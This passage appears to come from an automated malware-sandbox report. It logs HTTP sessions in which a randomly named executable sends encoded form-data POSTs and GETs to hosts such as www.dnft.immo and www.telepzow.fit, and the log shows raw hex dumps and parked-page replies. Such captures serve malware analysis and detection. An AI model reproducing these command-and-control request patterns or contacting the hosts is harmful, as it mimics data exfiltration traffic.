                                                      Data Ascii: 6A3Rk/M55Fixvtg1wMNWf5KcdWp3Ytyt7kXNpPJ7C85HQRU10Q/QJJs9SOerHlpqTLUcH/8nswYOrK8wP0IpsbJV0n43/EaRUF7J/PI6mwIusgQP2rUYBqKuQkpHFB1c5YvBZkx9PgUnVkb5ELOPJSGYmEnyxkEEp2pCrRCroH+coazqRdUsCaCKeT+AjIOpdldZEaQpGYfLQxaQ08HNo1GlKiMqyiSOtED+mSkYiYPqB4z+whT
                                                      Dec 13, 2024 13:18:48.725356102 CET2472OUTData Raw: 51 4c 4c 57 6c 52 52 6c 6e 37 51 70 39 67 4d 69 71 70 49 70 43 48 48 6f 76 6b 50 34 47 64 70 59 79 45 49 76 49 75 50 75 4a 38 66 77 2f 42 39 72 57 4e 57 42 73 48 47 62 6f 6b 49 69 50 2f 4d 4c 55 58 63 7a 5a 70 44 4b 6d 5a 34 6d 50 32 64 52 76 30
                                                      Data Ascii: QLLWlRRln7Qp9gMiqpIpCHHovkP4GdpYyEIvIuPuJ8fw/B9rWNWBsHGbokIiP/MLUXczZpDKmZ4mP2dRv0JBzk+iVrU9VBIn5kwjsYCOxjunUKglfbvs0W9gAE1NIiUiQVN+orUKbNM4EAFof8zOkPx1fbgR0oCFiGtGUi8RptHfv1pD0aNbmE23PAHiKJV6XSCci51WM1MliLGBYjHiSVdZPzDoTz6CGLQrGPEqSd9DeipFKrE
                                                      Dec 13, 2024 13:18:48.725547075 CET6147OUTData Raw: 7a 41 66 66 74 76 39 59 61 50 42 38 44 70 75 38 36 79 52 79 5a 55 5a 79 6e 71 4d 66 43 5a 2f 4a 70 55 72 78 36 36 5a 39 74 71 31 36 49 54 54 6b 58 59 53 69 64 68 31 71 67 70 69 2f 57 78 69 51 36 52 47 4c 49 69 5a 70 53 76 6d 6c 44 6b 68 46 49 54
                                                      Data Ascii: zAfftv9YaPB8Dpu86yRyZUZynqMfCZ/JpUrx66Z9tq16ITTkXYSidh1qgpi/WxiQ6RGLIiZpSvmlDkhFIT/hIym0S2f0S/hAZF56FPoWIQBonpL6YDGGbQG2pgA4+h/1JNsggecVPY9ueJGR+CM93DlEMZHJy5wM5ApJXnk1zghVnzHBNIG9nEK7NYz0n0HBSVD6ATvwPShmQg3k8DeSXONqBvYGqsLBjNOOhBxstjlKyrhcEIu


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.2449792172.67.155.214806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:51.145190001 CET440OUTGET /oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.telepzow.fit
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:18:52.731097937 CET934INHTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:52 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6vOCY2UsXyGnBoOqK6hB8vtFXVPltGmT3FfWL4dzuAzMxbCVO%2FW70q7dF%2FjIm8K4HVio%2B2nZ3dm1UgDmGdmpkcX3T%2BIM%2B1OCOBpAwE5TPZNGD3MqXuDnHdJAih0CTvXGK7x"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e6336e4c43bb-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=440&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.2449793199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:58.996330023 CET701OUTPOST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 78 55 41 74 38 4a 4f 72 41 66 76 7a 62 59 77 63 52 6e 59 69 55 54 69 68 7a 64 73 31 50 4d 74 57 6d 74 5a 51 62 42 55 65 6e 79 39 51 78 43 30 2f 77 6a 70 6e 4d 6e 66 45 51 51 45 6d 73 70 4c 6f 54 59 4d 79 55 4d 32 49 46 31 75 36 4e 70 63 69 57 44 39 5a 49 37 43 69 63 48 67 72 34 76 44 61 52 43 6d 4f 54 48 58 49 59 6d 30 39 62 76 2b 58 43 37 35 32 35 6e 70 35 30 44 5a 76 50 31 6c 71 36 2b 45 4d 4a 76 51 63 47 4f 73 4c 69 6c 2b 4e 52 77 49 33 69 56 5a 56 56 6c 41 51 4e 64 75 77 6e 65 4f 61 56 41 55 31 4b 46 6a 4d 37 32 76 46 32 6b 33 42 4a 51 3d 3d
                                                      Data Ascii: BTV4RR_=2NeWI1jcYlDHxUAt8JOrAfvzbYwcRnYiUTihzds1PMtWmtZQbBUeny9QxC0/wjpnMnfEQQEmspLoTYMyUM2IF1u6NpciWD9ZI7CicHgr4vDaRCmOTHXIYm09bv+XC7525np50DZvP1lq6+EMJvQcGOsLil+NRwI3iVZVVlAQNduwneOaVAU1KFjM72vF2k3BJQ==
                                                      Dec 13, 2024 13:19:00.074666977 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:18:59 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: a5c2cc54-99f2-4dc1-aea4-5f76263d33cf
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                      set-cookie: parking_session=a5c2cc54-99f2-4dc1-aea4-5f76263d33cf; expires=Fri, 13 Dec 2024 12:33:59 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:00.074754000 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVjMmNjNTQtOTlmMi00ZGMxLWFlYTQtNWY3NjI2M2QzM2NmIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.2449794199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:01.662595987 CET1073OUTPOST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 4a 57 6d 4d 70 51 61 45 6f 65 67 79 39 51 2b 69 30 41 76 7a 6f 6c 4d 67 58 36 51 53 41 6d 73 6f 72 6f 52 71 45 79 44 38 32 58 4c 31 75 2f 61 5a 63 52 50 7a 39 74 49 37 44 33 63 48 68 73 34 76 58 61 66 6a 47 4f 57 30 50 49 59 6d 30 37 64 66 2b 36 51 4c 35 66 35 6e 52 6c 30 43 55 33 50 77 6c 71 35 65 6b 4d 43 50 51 44 42 75 73 48 71 46 2f 2f 59 43 4d 39 6b 6e 51 69 58 6b 41 5a 4f 38 47 6f 37 74 6d 38 4e 67 41 39 4f 57 36 48 2b 7a 65 30 31 55 79 75 63 7a 4e 69 39 6c 56 6e 4a 32 49 56 70 49 72 2b 6b 4d 33 61 42 38 6e 6e 6c 7a 67 73 6f 5a 56 6f 6e 4a 52 62 70 43 78 6c 33 79 54 6c 68 54 41 2f 71 41 45 4f 6f 7a 30 38 73 74 62 75 62 56 2b 58 70 52 6c 77 6d 63 72 49 31 69 4d 4e 6a 31 38 6f 70 55 36 45 68 6a 69 6e 49 63 69 6b 43 4c 73 50 32 6d 36 2b 61 35 39 78 7a 41 77 61 65 42 37 52 72 53 6f 4d 6d 2b 74 66 38 46 61 48 63 6a 77 39 51 47 62 34 39 38 71 75 48 49 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeJWmMpQaEoegy9Q+i0AvzolMgX6QSAmsoroRqEyD82XL1u/aZcRPz9tI7D3cHhs4vXafjGOW0PIYm07df+6QL5f5nRl0CU3Pwlq5ekMCPQDBusHqF//YCM9knQiXkAZO8Go7tm8NgA9OW6H+ze01UyuczNi9lVnJ2IVpIr+kM3aB8nnlzgsoZVonJRbpCxl3yTlhTA/qAEOoz08stbubV+XpRlwmcrI1iMNj18opU6EhjinIcikCLsP2m6+a59xzAwaeB7RrSoMm+tf8FaHcjw9QGb498quHIzbf7K34TK09lnDblRq7G5Nry0rHX2Y+S5ul3FLLV6TXfpqmK9Mc7Teu5Fc7i6xepEt28Cxg8dv6N9kSC1g0yrYqlsdMZ6l78nmnlZsJ321xwolbGl3MCdakf44yKl5dDLrO3dfHGbQqQeY1bmTG8tymS+GBGa7PViWVGQiDVR91tw/XT+bVL0kyG6tQIrTwreWoKWSUjPPIDaQA/96fHJo7afzNCH5dbGIuwJCh8dpvMs=
                                                      Dec 13, 2024 13:19:02.747889042 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:01 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: fd90465b-ca5e-4736-958b-cd3e36228181
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                      set-cookie: parking_session=fd90465b-ca5e-4736-958b-cd3e36228181; expires=Fri, 13 Dec 2024 12:34:02 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:02.747917891 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmQ5MDQ2NWItY2E1ZS00NzM2LTk1OGItY2QzZTM2MjI4MTgxIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.2449795199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:04.356589079 CET12360OUTPOST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 42 57 6c 2b 68 51 61 6e 41 65 68 79 39 51 33 43 30 37 76 7a 70 39 4d 6d 2b 39 51 53 4d 63 73 73 62 6f 52 35 63 79 44 61 61 58 64 31 75 38 66 5a 63 68 57 44 39 70 49 37 54 72 63 48 6c 38 34 72 76 61 52 30 53 4f 56 33 58 4a 53 47 30 39 62 76 2b 68 43 37 35 57 35 6e 68 68 30 43 41 33 4d 41 70 71 35 62 49 4d 53 4f 51 44 41 4f 73 48 6f 46 2f 75 53 6a 78 46 6b 6e 52 72 58 6b 56 45 50 50 2b 6f 34 66 2b 38 62 41 41 2b 46 47 37 4f 79 54 65 79 69 6b 79 70 63 79 70 69 39 6b 6c 6e 49 46 59 56 6f 70 4c 2b 32 38 33 5a 55 73 6e 6e 74 54 67 71 6c 35 5a 4a 6e 4a 52 54 70 41 63 79 33 79 48 6c 67 77 59 2f 76 31 77 4e 6a 7a 30 2f 69 4e 62 4a 56 31 2b 64 70 52 70 38 6d 63 6a 49 30 54 6b 4e 69 47 6b 6f 74 58 43 4c 6a 7a 69 67 43 38 69 2b 4d 73 6c 6e 32 6d 79 36 61 38 6f 73 7a 7a 34 61 65 42 4c 52 35 6a 6f 4d 75 75 74 66 2b 46 61 4a 53 44 77 6c 51 47 62 34 39 38 6d 75 48 37 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeBWl+hQanAehy9Q3C07vzp9Mm+9QSMcssboR5cyDaaXd1u8fZchWD9pI7TrcHl84rvaR0SOV3XJSG09bv+hC75W5nhh0CA3MApq5bIMSOQDAOsHoF/uSjxFknRrXkVEPP+o4f+8bAA+FG7OyTeyikypcypi9klnIFYVopL+283ZUsnntTgql5ZJnJRTpAcy3yHlgwY/v1wNjz0/iNbJV1+dpRp8mcjI0TkNiGkotXCLjzigC8i+Msln2my6a8oszz4aeBLR5joMuutf+FaJSDwlQGb498muH7nbNaK3sSK3z1nNelQo7GETrxR0HW2I+iFulB5LOniQQfoisa9aXbe6u4pM7nixfZot1puxw7Bo9N9gIi1ppCrUqlpgMYeP8MDmnlJsJ321xwojSWlzMCdWkf4SyLNDdHvrO2NfHFDT7Aed87mJfsswmWrlBEOrOjGWW3QiAVQP89wzXT+ORL0ryFWPQJCYwa+WoKGSNQnJSFbwP/dCOm5zyoPJLi3oQ7S+3iZK2/Ev2KprklViT2zLtGTClUM0lqIrMfNaCoKNnX86/1g0DRfOztQNNPaI0OHx8FWyZjvJ1AW5J0zgtIH/lR0xtfZv5p99hUW/W5VutGYMPiiu5cvUHGeIUCVTOjwgE2TxvBmhUZPTj5XlHR5JD8Bu2IIQp1ewjhGmOf5JToAqJQTt4BTTrJ3xkDbzU1XKDSu/GTg/UAcJIqdFPuBK8kxVKx96PB8b5UwzwEEuL9xHxCqY6lFf+5aDZMhjGtsRoajdUGZqOe/nd6vSPXB+131eWpF7O/qAY3k+/QEU0N7ug3WOZpK6oJz7DCCYVLrp039MAQdsZu+mtWZs3gmuXFtc9/cubaW71yG1Nbcxi+3RjE8Of/EY/J1z7UY2+VUJYdj120HUd0ElmPQuPbSjYsW+iG76rRb3Ibaay2353DCFHs1bkjLbnJtpCfoJhpBw [TRUNCATED]
                                                      Dec 13, 2024 13:19:04.476937056 CET17304OUTData Raw: 63 32 36 47 4d 65 63 4d 73 78 34 79 51 6c 73 68 43 36 4e 72 43 35 63 45 34 6c 31 2f 45 66 42 4b 77 5a 76 56 46 4e 70 45 47 4b 71 6a 4a 33 65 44 74 4e 47 33 38 66 78 6f 6a 78 36 51 65 38 71 2f 43 65 78 39 36 6b 7a 32 47 61 2b 32 39 6b 4d 43 6b 62
                                                      Data Ascii: c26GMecMsx4yQlshC6NrC5cE4l1/EfBKwZvVFNpEGKqjJ3eDtNG38fxojx6Qe8q/Cex96kz2Ga+29kMCkbHKrfqbl203QkyH1h1EgFDtsXRtTTgVJbkU9eQdKTqC43MioBFvHKDDNiMaZiJg8HnBFbSKv90KBTep6x8Y5kTnFQXYpShOX0x65A17ZebtGc3fNat48wOGlHbkkKMoyXpi4IjDBc0RGRpzmYZe9MpnES1wyiRBQOn
                                                      Dec 13, 2024 13:19:04.477005959 CET4944OUTData Raw: 41 4c 33 72 74 4f 55 76 62 4b 70 43 75 55 36 7a 74 4d 54 73 34 72 71 4d 49 73 66 51 78 47 6e 44 32 6e 49 74 78 68 39 35 4e 49 43 64 38 63 6c 47 4a 74 44 5a 72 46 2b 43 51 2f 32 2b 73 6c 4c 75 6f 4b 54 6f 4f 74 76 73 6a 2b 4c 4e 62 44 6b 35 32 35
                                                      Data Ascii: AL3rtOUvbKpCuU6ztMTs4rqMIsfQxGnD2nItxh95NICd8clGJtDZrF+CQ/2+slLuoKToOtvsj+LNbDk525l7+1eMIUyPrxgHc+H1wthoY8j+21kS2QogPNEFlkEQ9Hy9I+zH8LZeRZUYi4hyTfGkHVWvA6G/lqyHy8ErGLETZTVGo2ug4a3KyyTwR+9ISJRfDApcNjDG/BjP/CPkXkbOj0sy3YoPt/JDLHb2i6Twn0ktuBOueyp
                                                      Dec 13, 2024 13:19:04.596688032 CET2472OUTData Raw: 53 79 32 73 6b 53 73 4a 68 4e 6a 6a 47 69 6f 6a 38 75 4e 5a 54 4c 47 38 4b 62 4d 69 6f 56 76 50 65 63 67 45 57 44 78 68 77 56 2f 69 32 38 50 45 47 6e 70 74 50 43 70 57 6a 33 2b 48 59 41 67 49 63 75 38 75 53 2b 2b 35 77 51 4f 38 71 50 2f 64 41 6f
                                                      Data Ascii: Sy2skSsJhNjjGioj8uNZTLG8KbMioVvPecgEWDxhwV/i28PEGnptPCpWj3+HYAgIcu8uS++5wQO8qP/dAo/JoXIE/mqzfSu6EhFRk1SmUMeRUROXINXVJ8w/fVP+gsB+vrt/VHcKNVpj97Mqex0AkQzWZ9/1Njyt+Hi6h5nYr2WdB79gYrEMeqWu+1M9OW0vY1Rne4cWB/UDceZYzDQf8N2I37cyZHVK9tfJaE/Klb4lOVcflHA
                                                      Dec 13, 2024 13:19:04.597042084 CET2472OUTData Raw: 76 46 70 48 41 45 6c 4b 48 79 35 33 68 31 39 4b 65 6c 72 37 4f 58 6b 42 63 48 49 6e 75 63 4b 70 65 35 32 44 53 78 48 4b 33 62 4d 39 33 4a 72 75 63 32 6d 6f 32 34 62 31 66 65 75 32 49 34 37 63 4d 61 4c 41 43 63 72 77 78 52 70 69 34 67 5a 7a 35 64
                                                      Data Ascii: vFpHAElKHy53h19Kelr7OXkBcHInucKpe52DSxHK3bM93Jruc2mo24b1feu2I47cMaLACcrwxRpi4gZz5drvBwUH649NP+YiXZqzQvsULsZMO5QCDj452I44MEh4MpR+woil1cJZGQInbMn0A54Tmb5fdw/M/KHdZYJ9+JPiNJ8Kj+/+UULjrznhZP3yvBe6yQAAjCm7L2Wz+/+pilwodsO6wVwrwOIQDrZY8z0dCsRUcCPKhEq
                                                      Dec 13, 2024 13:19:04.597057104 CET2472OUTData Raw: 38 4e 39 4a 6c 54 76 35 42 73 76 62 64 5a 49 79 63 57 6b 43 6b 67 4b 54 71 66 6a 5a 58 71 35 64 75 77 71 39 2b 55 58 76 4c 50 41 69 33 59 78 64 34 66 4b 4e 66 70 43 65 46 77 71 2f 55 6a 2f 4f 61 4f 55 41 2b 55 4a 68 38 43 4a 74 6e 46 79 54 54 6e
                                                      Data Ascii: 8N9JlTv5BsvbdZIycWkCkgKTqfjZXq5duwq9+UXvLPAi3Yxd4fKNfpCeFwq/Uj/OaOUA+UJh8CJtnFyTTn4N4rPuP+B1ZGtcZc/vi/Ex/D1bDlcaZqktDQiR43/b/XEzTFO/tZleOIAMbExVMxLfYspCtyGuN8vgywpQzEIOBg1ccaB0MfLOwS2vZwF3YVLyIA76gLk8sDL6FodTPYd4rKtITTfKXmUkMlQIVMSbpoenQIZbPcP
                                                      Dec 13, 2024 13:19:04.597084999 CET2472OUTData Raw: 61 50 41 4a 54 49 55 77 6b 4e 76 53 32 6c 34 6c 39 6d 62 56 5a 56 79 69 78 64 4e 2f 6a 46 70 38 59 4d 59 38 4c 4e 7a 76 34 6e 67 7a 6d 73 72 34 53 6d 32 4b 69 6f 7a 52 47 30 58 58 52 53 59 70 7a 70 32 35 74 39 62 74 79 52 33 44 63 33 56 6f 45 33
